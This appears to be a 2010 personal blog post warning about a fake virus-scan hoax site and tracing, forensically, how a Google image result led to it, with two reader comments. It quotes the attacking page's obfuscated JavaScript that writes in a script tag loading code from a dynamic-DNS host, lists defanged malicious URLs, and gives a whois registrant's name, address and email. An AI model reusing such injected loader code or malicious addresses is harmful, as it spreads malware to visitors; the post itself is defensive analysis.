?

Log in

No account? Create an account

Fake virus warnings - John C. Kirk

Oct. 29th, 2010

08:55 pm - Fake virus warnings

Previous Entry Share Next Entry

Someone called me earlier, because she had a big virus warning on her screen. This was actually a hoax (a web page trying to install malware), so it's useful to be aware of it, so that you know what to recognise.

At the moment, you can duplicate this if you go to this page:
hxxp://www3.new-protectionsoft23.in/?4ec0=%9B%EC%E0%97k%A0%96%B0c%96%E2%D8%D8%A2%96%9A%D5%E2%AB%A3%95%DA%E8%9Ep%5E%9A%9Fh%C8%9Ch%A8%D8%A8iR
I've deliberately changed "http" to "hxxp", so that you don't click on it by accident. This is a malicious site, so only go there if you're sure that you can get away safely. I've observed the same behaviour in IE8 and Firefox 3.6.12 (on Windows 7), but I haven't tried any other OS/browser.

The main webpage disappears, and instead you get a message box:

Message from webpage

Note that this says "Message from webpage", i.e. this has come from the internet, not your local computer. (The equivalent Firefox message tells you which website has generated it.) At this point, you should get rid of the message without clicking "OK" or the red X. I tried Alt+F4 (in IE), but that still acted as if I'd clicked OK, so the only certain method is to run Task Manager, select this app, then click "End Task".

Anyway, if you do click "OK", you then see a window like this, which appears to be doing a virus scan:

Security Analysis

As a general tip, any program that claims to have scanned your entire hard drive in a couple of seconds is lying!

If you try to get rid of this window, it nags you to stick around:

Don't leave me!

If you click anywhere on the "Security Analysis" screen, it prompts you to download a file:

Download

That's the whole purpose of the exercise - the people who set up the hoax want you to run this file, which will then do something nasty to your computer, e.g. joining their botnet. So, you don't want this file! If you get this far, use Task Manager to shut down the web browser completely.

In theory, you could download the program, scan it for viruses, then run it if it's safe. However, I used McAfee VirusScan Enterprise 8.7 (with all the latest security updates), and that told me that the file was clean. In fairness, I haven't actually run the program, so I am just assuming that it's bad. However, I trust my instincts more than I trust any anti-virus software.

So, if your computer suddenly tells you that you've got loads of viruses, don't panic. If you're not sure what to do, ask for advice. This certainly applies if you're at work: I think I speak for all IT staff when I say that we'd much rather help you out beforehand than clean up the mess afterwards.

The rest of this post is a bit more "forensic", since I've been trying to work out how this happened. This will be very technical, so don't bother reading if you're not an IT person :) If you are a techie, you may be able to help out where I've got stuck. As far as I can tell, here are the steps to reproduce the problem:

1. Go to Google.

2. Do an image search for "map of central america" (without the quotes).

3. The 12th image (at the time of writing) looks like this:
Central America
and it takes you to:
hxxp://america.film.bigbestmovie.com/mapofcentralamerica/
(Again, I've mangled the URL to avoid accidental clicking.)

I think that's it, so I can't fault anyone for being taken in. I don't see the fake virus warning on my PC, but based on the firewall logs and my examination of the page, that's all the other person did. Mind you, it's also odd that the virus warning apparently appeared 10 minutes later, so she thought that it was from a different site.

The bigbestmovie page has 4 maps at the top, which are all "stolen" (hotlinked) from other sites. In particular, the one that showed up in the Google image results is this one:
http://www.godsgeography.com/centralamerica/central1.jpg
as used on this page:
http://www.godsgeography.com/centralamerica/central1.html
Just to clarify, the "God's Geography" site looks completely safe, and they have nothing to do with the dodgy stuff going on elsewhere; they're just an innocent bystander.

Looking at the HTML source for the bigbestmovie page, it has 3 blocks of JavaScript at the start of the <body> section:

<script language='JavaScript' >
var c1 = "partner.js?frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x1 = "/"+c1;
var y1 = "<s"+"cript language='JavaScript' src='"+x1+"' ><"+"/"+"script>";
document.write(y1);
</script>
<script language='JavaScript' >
var b1="ucy";
var b2="gan";
var b3="ijo";
var b4=".dy";
var b5="ndn";
var b6="s-s";
var b7="erv";
var b8="er.";
var b9="com";
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
var y = "<s"+"cript language='JavaScript' src='"+x+"' ><"+"/"+"script>";
document.write(y);
</script>
<script src="/nlc/in.cgi?14"></script>


The first 2 get replaced at runtime, so the block then looks like this:

<script language='JavaScript' src='/partner.js?frm=GOOGLE&default_keyword=DOCTITLE' ></script>
<script language='JavaScript' src='hxxp://ucyganijo.dyndns-server.com/partner.js?num=114&frm=GOOGLE&default_keyword=DOCTITLE' ></script>"
<script src="/nlc/in.cgi?14"></script>


The bits in CAPITALS are just placeholders: GOOGLE is the URL of the Google results page, and DOCTITLE is the title of this (bigbestmovie.com) page. So, the first line would really look something like this:

hxxp://america.film.bigbestmovie.com/partner.js?frm=http%3A%2F%2Fwww.google.co.uk%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fwww.godsgeography.com%2Fcentralamerica%2Fcentral1.jpg%26imgrefurl%3Dhttp%3A%2F%2Famerica.film.bigbestmovie.com%2Fmapofcentralamerica%2F%26usg%3D__y6l4u91mTPtVWxuGqWCeb3AtMV4%3D%26h%3D340%26w%3D402%26sz%3D43%26hl%3Den%26start%3D0%26zoom%3D1%26tbnid%3DVzeOZ_s6A3kgEM%3A%26tbnh%3D157%26tbnw%3D186%26prev%3D%2Fimages%253Fq%253Dmap%252Bof%252Bcentral%252Bamerica%2526um%253D1%2526hl%253Den%2526biw%253D1131%2526bih%253D659%2526tbs%253Disch%3A1%26um%3D1%26itbs%3D1%26iact%3Drc%26dur%3D312%26ei%3Ds_HKTNOYF5GD4Ab47LTcDA%26oei%3Ds_HKTNOYF5GD4Ab47LTcDA%26esq%3D1%26page%3D1%26ndsp%3D12%26ved%3D1t%3A429%2Cr%3A11%2Cs%3A0%26tx%3D112%26ty%3D119&default_keyword=map%20of%20central%20america

The second JavaScript file is a bit odd, because the server name changed. The firewall logs referred to:
hxxp://agosagyvux.dyndns-blog.com/
rather than:
hxxp://ucyganijo.dyndns-server.com/
DynDNS.com is a legitimate site, which sells sub-domains in "dyndns-blog.com" and "dyndns-server.com" (among others), so agosagyvux and ucyganijo are the equivalent of LiveJournal usernames. I assume that they both belong to the same person, although I'm not sure why he's using DynDNS at all. Maybe the dodgy code is being hopped around to different machines on a botnet? That being the case, it's curious that the bigbestmovie.com page also got updated to refer to a different name, particularly in such a short space of time (less than 2 hours).

I've tried to download the partner.js files, but if I just request the files themselves (no parameters) then I get a 404 error. If I supply the full address from the firewall log, I can download something. However, the one from bigbestmovie.com is a 0 byte file, and the one from the DynDNS site is only 2 bytes (appearing as whitespace in Notepad). This may mean that there's something sneaky going on, so you only get the real JavaScript file if there's a referring page, but I can't find any copies in my cache. Alternately, they may both be red herrings, with the real work being done in the CGI file, e.g. that might be generating new JavaScript on the fly. Any suggestions would be welcome.

If I go to:
http://www3.new-protectionsoft23.in/
then it redirects me to:
http://www.welcomewave.net/?uid=7&isRedirected=1
which just has a list of YouTube videos. This seems like an overtly innocent site, i.e. it's deliberately intended to divert suspicion. I'm not sure what the uid is for; maybe this site is a front for lots of malware sites, and they want to keep track of their customers?

If I pass a parameter to the site, as above:
hxxp://www3.new-protectionsoft23.in/?4ec0=%9B%EC%E0%97k%A0%96%B0c%96%E2%D8%D8%A2%96%9A%D5%E2%AB%A3%95%DA%E8%9Ep%5E%9A%9Fh%C8%9Ch%A8%D8%A8iR
it then redirects me to a different site. Again, I've found that the addresses keep changing, which makes it hard to do any effective blocking. Initially, it went to:
www1.smart-yourholder.in
I noticed that this URL is similar to the one above, i.e. they're both Indian sites containing numbers and punctuation. According to whois for India, they are indeed both registered to the same person:
Adam Allen, 87 Columbia Heights, New York 11013
dmallen51@gmail.com

On subsequent visits, the "new-protectionsoft23" page has also redirected me to:
www1.bestdrive-keeper.in
www2.netprotection-soft48.in
I haven't bothered doing a search, but I'm guessing that these domains also belong to the same guy.

I've got that far, but now I'm stuck. Should I report this to someone? If so, whom? I don't know whether the bigbestmovie.com site is directly involved in this, or whether they've been hacked. However, even in the best case scenario they look a bit dodgy, i.e. stealing content and throwing in phrases like "miss america" to attract search engines, and for practical purposes they're still dangerous to visitors. Google might be willing to block that site from their search results; the only snag is that I can't duplicate the problem on my machine, so they might not get it either. Again, any suggestions would be welcome.

Ah well, if nothing else it's been an interesting exercise.

Comments:

[User Picture]
From:billyabbott
Date:November 1st, 2010 12:08 am (UTC)
(Link)
Your initial link is flagged by Firefox as a known malware site and has also now been taken down - the domain isn't findable any more from my machine.

The thing I liked most when I went to the bigbestmovie site (which didn't load for me on Firefox OSX - just hung trying to load something) was that a site it was trying to get something from was qooglesearch.com, which is remarkably effective at fooling when you see it in the status bar.
(Reply) (Thread)
[User Picture]
From:tommy50702
Date:November 9th, 2014 01:35 pm (UTC)
(Link)
I encountered this twice already.
(Reply) (Thread)